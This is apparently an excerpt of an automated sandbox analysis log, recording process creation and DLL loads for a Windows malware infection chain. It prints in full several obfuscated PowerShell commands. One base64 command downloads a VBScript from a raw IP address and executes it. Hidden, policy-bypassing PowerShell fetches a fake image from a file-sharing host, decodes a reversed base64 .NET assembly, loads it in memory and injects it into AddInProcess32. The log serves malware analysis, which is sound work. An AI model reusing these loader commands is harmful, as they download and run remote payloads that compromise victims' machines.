Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
